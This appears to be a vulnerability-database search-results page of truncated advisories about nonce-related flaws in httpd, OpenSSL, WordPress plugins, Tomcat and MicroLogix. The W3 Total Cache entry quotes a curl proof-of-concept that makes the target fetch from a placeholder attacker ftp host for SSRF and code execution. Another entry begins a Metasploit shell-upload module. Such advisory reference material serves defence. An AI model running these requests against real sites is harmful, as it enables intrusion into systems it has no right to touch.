Lucene search
K

8823 matches found

RedHat Linux
RedHat Linux
added 2019/07/29 3:39 p.m.4 views

httpd: Weak Digest auth nonce generation in mod_auth_digest

In Apache httpd 2.2.0 to 2.4.29, when generating an HTTP Digest authentication challenge, the nonce sent to prevent reply attacks was not correctly generated using a pseudo-random seed. In a cluster of servers using a common Digest authentication configuration, HTTP requests could be replayed...

9.8CVSS7.3AI score0.15885EPSS
Exploits0References5
RedHat Linux
RedHat Linux
added 2019/07/29 3:39 p.m.201 views

Low: Red Hat Security Advisory: httpd security update

An update for httpd is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System CVSS base score, which gives a detailed severity rating, is available for each vulnerability from the CVE...

9.8CVSS6.6AI score0.15885EPSS
Exploits0References2
wpexploit
wpexploit
added 2019/07/15 12:0 a.m.27 views

Ad Inserter <= 2.4.21 - Authenticated Remote Code Execution

The Ad Inserter – Ad Manager & AdSense Ads WordPress plugin was affected by an Authenticated Remote Code Execution security vulnerability. The nonce aicheck in the final request can be obtained by querying the homepage with the AIWPDEBUGGING cookie set to 2. Then, use an account with a role as lo...

6.5CVSS0.7AI score0.03635EPSS
Exploits2References2
WPVulnDB
WPVulnDB
added 2019/07/07 12:0 a.m.10 views

WooCommerce <= 3.6.4 - Cross-Site Request Forgery (CSRF) & File Type Check

Changelog mentions: Security – Introduce file type check for tax rate importer. Security – Added nonce check to CSV importer actions. RIPS Tech later released an advisory detailing the vulnerability, which can be found in the references...

6.9AI score
Exploits0References4Affected Software1
OpenVAS
OpenVAS
added 2019/07/03 12:0 a.m.111 views

OpenSSL: ChaCha20-Poly1305 with long nonces (CVE-2019-1543) - Windows

OpenSSL is prone to a vulnerability which allows a nonce reuse. SPDX-FileCopyrightText: 2019 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE = "cpe:/a:openssl:openssl";...

7.4CVSS7.4AI score0.05701EPSS
Exploits0References6
Tenable Nessus
Tenable Nessus
added 2019/07/02 12:0 a.m.53 views

Debian DSA-4475-1 : openssl - security update

Joran Dirk Greef discovered that overly long nonces used with ChaCha20-Poly1305 were incorrectly processed and could result in nonce reuse. This doesn't affect OpenSSL-internal uses of ChaCha20-Poly1305 such as TLS. C Tenable Network Security, Inc. The descriptive text and package checks in this...

7.4CVSS6.3AI score0.05701EPSS
Exploits0References5
Debian
Debian
added 2019/07/01 9:12 p.m.128 views

[SECURITY] [DSA 4475-1] openssl security update

------------------------------------------------------------------------- Debian Security Advisory DSA-4475-1 [email protected] https://www.debian.org/security/ Moritz Muehlenhoff July 01, 2019 https://www.debian.org/security/faq -...

7.4CVSS6.3AI score0.05701EPSS
Exploits0
ArchLinux
ArchLinux
added 2019/06/11 12:0 a.m.48 views

[ASA-201906-7] openssl: information disclosure

Arch Linux Security Advisory ASA-201906-7 ========================================= Severity: Low Date : 2019-06-11 CVE-ID : CVE-2019-1543 Package : openssl Type : information disclosure Remote : Yes Link : https://security.archlinux.org/AVG-919 Summary ======= The package openssl before version...

7.4CVSS5.9AI score0.05701EPSS
Exploits0References4
ArchLinux
ArchLinux
added 2019/06/11 12:0 a.m.35 views

[ASA-201906-6] lib32-openssl: information disclosure

Arch Linux Security Advisory ASA-201906-6 ========================================= Severity: Low Date : 2019-06-11 CVE-ID : CVE-2019-1543 Package : lib32-openssl Type : information disclosure Remote : Yes Link : https://security.archlinux.org/AVG-920 Summary ======= The package lib32-openssl...

7.4CVSS5.9AI score0.05701EPSS
Exploits0References4
Tenable Nessus
Tenable Nessus
added 2019/06/03 12:0 a.m.32 views

OpenSSL 1.1.0 < 1.1.0k Vulnerability

The version of OpenSSL installed on the remote host is prior to 1.1.0k. It is, therefore, affected by a vulnerability as referenced in the 1.1.0k advisory. - ChaCha20-Poly1305 is an AEAD cipher, and requires a unique nonce input for every encryption operation. RFC 7539 specifies that the nonce...

7.4CVSS6.3AI score0.05701EPSS
Exploits0References4
Tenable Nessus
Tenable Nessus
added 2019/06/03 12:0 a.m.293 views

OpenSSL 1.1.1 < 1.1.1c Vulnerability

The version of OpenSSL installed on the remote host is prior to 1.1.1c. It is, therefore, affected by a vulnerability as referenced in the 1.1.1c advisory. - ChaCha20-Poly1305 is an AEAD cipher, and requires a unique nonce input for every encryption operation. RFC 7539 specifies that the nonce...

7.4CVSS6.3AI score0.05701EPSS
Exploits0References4
Cvelist
Cvelist
added 2019/05/22 5:5 p.m.36 views

CVE-2019-11231

An issue was discovered in GetSimple CMS through 3.3.15. insufficient input sanitation in the theme-edit.php file allows upload of files with arbitrary content PHP code, for example. This vulnerability is triggered by an authenticated user; however, authentication can be bypassed. According to th...

9.7AI score0.71598EPSS
Exploits5References2
Tenable Nessus
Tenable Nessus
added 2019/05/08 12:0 a.m.15 views

Rockwell Automation/Allen-Bradley MicroLogix Controllers <= 16.00 Nonce Key Pair Reuse

Binary data 720126.prm...

9.8CVSS7.3AI score0.02559EPSS
Exploits0References2
Tenable Nessus
Tenable Nessus
added 2019/05/06 12:0 a.m.45 views

EulerOS 2.0 SP3 : openssl110f (EulerOS-SA-2019-1328)

According to the version of the openssl110f packages installed, the EulerOS installation on the remote host is affected by the following vulnerability : - ChaCha20-Poly1305 is an AEAD cipher, and requires a unique nonce input for every encryption operation. RFC 7539 specifies that the nonce value...

7.4CVSS6.3AI score0.05701EPSS
Exploits0References2
wpexploit
wpexploit
added 2019/05/06 12:0 a.m.37 views

W3 Total Cache <= 0.9.7.3 - Blind SSRF and RCE via phar

The implementation of opcacheflushfile calls fileexists with a parameter fully controlled by the user. curl 'http://x.x.x.x/wp-content/plugins/w3-total-cache/pub/opcache.php' --data 'nonce=974ca6ad15021a6668e7ae02e1be551c&command=flushfile&file=ftp://y.y.y.y:zzzz/' Note: The nonce value is given ...

1.6AI score
Exploits0References1
Tenable Nessus
Tenable Nessus
added 2019/05/06 12:0 a.m.28 views

EulerOS 2.0 SP2 : openssl110f (EulerOS-SA-2019-1327)

According to the version of the openssl110f packages installed, the EulerOS installation on the remote host is affected by the following vulnerability : - ChaCha20-Poly1305 is an AEAD cipher, and requires a unique nonce input for every encryption operation. RFC 7539 specifies that the nonce value...

7.4CVSS6.3AI score0.05701EPSS
Exploits0References2
Veracode
Veracode
added 2019/05/02 4:55 a.m.18 views

Authentication Bypass

tomcat6 is vulnerable to authentication bypass. The vulnerability exists through the ability to perform replay attacks after a nonce becomes stale...

2.6CVSS6.1AI score0.02128EPSS
Exploits2References6Affected Software1
Packet Storm
Packet Storm
added 2019/04/04 12:0 a.m.349 views

WordPress 5.0.0 crop-image Shell Upload

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'WordPress Crop-image Shell Upload', 'Description' = %q This module exploits a path traversal and a local file inclusion vulnerability on WordPres...

6.5CVSS7.6AI score0.91985EPSS
Exploits10
RedhatCVE
RedhatCVE
added 2019/04/03 11:49 p.m.36 views

CVE-2019-1543

ChaCha20-Poly1305 is an AEAD cipher, and requires a unique nonce input for every encryption operation. RFC 7539 specifies that the nonce value IV should be 96 bits 12 bytes. OpenSSL allows a variable nonce length and front pads the nonce with 0 bytes if it is less than 12 bytes. However it also...

7.4CVSS0.5AI score0.05701EPSS
Exploits0References3
myhack58
myhack58
added 2019/03/17 12:0 a.m.305 views

WordPress 5.1: from CSRF to RCE-vulnerability warning-the black bar safety net

One, Foreword Note: this exploit and the environment is more complex, the actual value may not be very high, but forXSSwith permissions management also has certain reference value. Last month we published a WordPress 5.0, a remote code execution RCE)vulnerabilities required by the authentication...

0.2AI score
Exploits0
Rows per page
Query Builder